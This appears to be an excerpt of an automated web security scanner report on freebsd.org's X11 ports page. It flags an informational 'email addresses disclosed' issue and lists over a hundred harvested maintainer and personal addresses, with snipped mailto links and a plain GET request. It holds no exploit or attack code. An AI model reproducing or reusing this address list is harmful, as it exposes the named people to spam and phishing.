<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bsd-sharp@googlegroups.com">bsd-sharp@googlegroups.com</A>
...[SNIP]...
<A HREF="mailto:mono@FreeBSD.org">mono@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:shuvaev@physik.uni-wuerzburg.de">shuvaev@physik.uni-wuerzburg.de</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kwm@FreeBSD.org">kwm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mono@FreeBSD.org">mono@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pav@FreeBSD.org">pav@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ashish@FreeBSD.org">ashish@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:erik@bz.bzflag.bz">erik@bz.bzflag.bz</A>
...[SNIP]...
<A HREF="mailto:pauls@utdallas.edu">pauls@utdallas.edu</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mono@FreeBSD.org">mono@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:devel@stasyan.com">devel@stasyan.com</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:emulation@FreeBSD.org">emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:emulation@FreeBSD.org">emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:emulation@FreeBSD.org">emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:devel@stasyan.com">devel@stasyan.com</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bsam@FreeBSD.org">bsam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:cm@therek.net">cm@therek.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@c0decafe.net">ports@c0decafe.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:swills@FreeBSD.org">swills@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:pauls@utdallas.edu">pauls@utdallas.edu</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@c0decafe.net">ports@c0decafe.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pauls@utdallas.edu">pauls@utdallas.edu</A>
...[SNIP]...
<A HREF="mailto:pauls@utdallas.edu">pauls@utdallas.edu</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:swills@FreeBSD.org">swills@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dmitry@karasik.eu.org">dmitry@karasik.eu.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dhn@FreeBSD.org">dhn@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:cm@therek.net">cm@therek.net</A>
...[SNIP]...
<A HREF="mailto:cm@therek.net">cm@therek.net</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@freebsd.org">ports@freebsd.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fmysh@iijmio-mail.jp">fmysh@iijmio-mail.jp</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:amdmi3@FreeBSD.org">amdmi3@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:wenheping@gmail.com">wenheping@gmail.com</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jacob.frelinger@duke.edu">jacob.frelinger@duke.edu</A>
...[SNIP]...
<A HREF="mailto:jacob.frelinger@duke.edu">jacob.frelinger@duke.edu</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lx@FreeBSD.org">lx@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:neal@nelson.name">neal@nelson.name</A>
...[SNIP]...
<A HREF="mailto:neal@nelson.name">neal@nelson.name</A>
...[SNIP]...
<A HREF="mailto:neal@nelson.name">neal@nelson.name</A>
...[SNIP]...
<A HREF="mailto:neal@nelson.name">neal@nelson.name</A>
...[SNIP]...
<A HREF="mailto:neal@nelson.name">neal@nelson.name</A>
...[SNIP]...
<A HREF="mailto:neal@nelson.name">neal@nelson.name</A>
...[SNIP]...
<A HREF="mailto:mwm@mired.org">mwm@mired.org</A>
...[SNIP]...
<A HREF="mailto:daichi@FreeBSD.org">daichi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:makc@FreeBSD.org">makc@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:makc@FreeBSD.org">makc@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:makc@FreeBSD.org">makc@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lercordeiro@gmail.com">lercordeiro@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:cyberbotx@cyberbotx.com">cyberbotx@cyberbotx.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:utisoft@gmail.com">utisoft@gmail.com</A>
...[SNIP]...
<A HREF="mailto:shuvaev@physik.uni-wuerzburg.de">shuvaev@physik.uni-wuerzburg.de</A>
...[SNIP]...
<A HREF="mailto:shuvaev@physik.uni-wuerzburg.de">shuvaev@physik.uni-wuerzburg.de</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rnoland@FreeBSD.org">rnoland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rnoland@FreeBSD.org">rnoland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:doconnor@gsoft.com.au">doconnor@gsoft.com.au</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kwm@FreeBSD.org">kwm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:m.sund@arcor.de">m.sund@arcor.de</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:araujo@FreeBSD.org">araujo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jochen@daten-chaos.de">jochen@daten-chaos.de</A>
...[SNIP]...
<A HREF="mailto:alepulver@FreeBSD.org">alepulver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:m.sund@arcor.de">m.sund@arcor.de</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.ORG">ports@FreeBSD.ORG</A>
...[SNIP]...
<A HREF="mailto:yokota@res.otaru-uc.ac.jp">yokota@res.otaru-uc.ac.jp</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kevlo@FreeBSD.org">kevlo@FreeBSD.org</A>
...[SNIP]...

24.321. http://www.freebsd.org/ports/x11.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/ports/x11.html

Issue detail

The following email addresses were disclosed in the response:

acm@FreeBSD.org
adam-ports@blacktabby.org
akosela@andykosela.com
ale@FreeBSD.org
alexander.pohoyda@gmx.net
amdmi3@FreeBSD.org
antoine.brodin@laposte.net
aragon@phat.za.net
ashish@FreeBSD.org
avg@icyb.net.ua
bapt@FreeBSD.org
bland@FreeBSD.org
c0rn@o2.pl
chip-set@mail.ru
citycat4@ngs.ru
corky1951@comcast.net
cy@FreeBSD.org
danfe@FreeBSD.org
darcsis@gmail.com
decept0@gmail.com
dhn@FreeBSD.org
dinoex@FreeBSD.org
domi@saargate.de
doublef@tele-kom.ru
dougb@FreeBSD.org
dsh@vlink.ru
ecrist@secure-computing.net
ehaupt@FreeBSD.org
eimar.koort@gmail.com
flz@FreeBSD.org
freebsd-emulation@FreeBSD.org
fullermd@over-yonder.net
g.veniamin@googlemail.com
gahr@FreeBSD.org
garga@FreeBSD.org
gerrit.beine@gmx.de
gnome@FreeBSD.org
gugod@gugod.org
h.eichmann@gmx.de
haskell@FreeBSD.org
hemi@puresimplicity.net
henry.hu.sh@gmail.com
hopet@ics.muni.cz
hrs@FreeBSD.org
idroxid01@yahoo.fr
itetcu@people.tecnik93.com
jacs@gnome.co.uk
joerg@FreeBSD.org
karlj000@unbc.ca
katsura@cc.osaka-kyoiku.ac.jp
kazu@jp.freebsd.org
kde@FreeBSD.org
kimelto@gmail.com
klammer@webonaut.com
kmoore@FreeBSD.org
kmoore@freebsd.org
koma2@lovepeers.org
krion@FreeBSD.org
lazyklimm@gmail.com
lewiz@compsoc.man.ac.uk
lioux@FreeBSD.org
lme@FreeBSD.org
lx@FreeBSD.org
maho@FreeBSD.org
marcus@FreeBSD.org
marius@nuenneri.ch
markus@FreeBSD.org
matt@bdd.net
matt@peterson.org
mi@aldan.algebra.com
miwi@FreeBSD.org
motoom@xs4all.nl
msk@nullpointer.dk
multimedia@FreeBSD.org
mwm@mired.org
naddy@FreeBSD.org
nivit@FreeBSD.org
nobutaka@FreeBSD.org
nork@FreeBSD.org
novel@FreeBSD.org
ntarmos@cs.uoi.gr
obrien@FreeBSD.org
oleg@bsdpower.com
olgeni@FreeBSD.org
oliver@FreeBSD.org
olivier@cochard.me
pav@FreeBSD.org
perl@FreeBSD.org
ports@FreeBSD.Org
ports@FreeBSD.org
ports@eitanadler.com
rene@FreeBSD.org
roam@FreeBSD.org
rodrigo@bebik.net
ruby@FreeBSD.org
sanpei@FreeBSD.org
schot@a-eskwadraat.nl
sec@42.org
sic_zer0@hotmail.com
simon@olofsson.de
spam@rm-rf.kiev.ua
stas@FreeBSD.org
stephen@missouri.edu
sunrychen@gmail.com
swell.k@gmail.com
sylvio@FreeBSD.org
t.kempka@web.de
tdb@FreeBSD.org
thierry@FreeBSD.org
tobez@FreeBSD.org
tom@hur.st
umeno@rr.iij4u.or.jp
uqs@FreeBSD.org
vlad@vlad.uz.ua
vvelox@vvelox.net
wxs@FreeBSD.org
x11@FreeBSD.org
xride@FreeBSD.org

Request

GET /ports/x11.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "3345228891"
Last-Modified: Sun, 23 Jan 2011 02:29:34 GMT
Content-Length: 1680230
Connection: close
Date: Mon, 24 Jan 2011 16:16:33 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: X11</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/htm
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
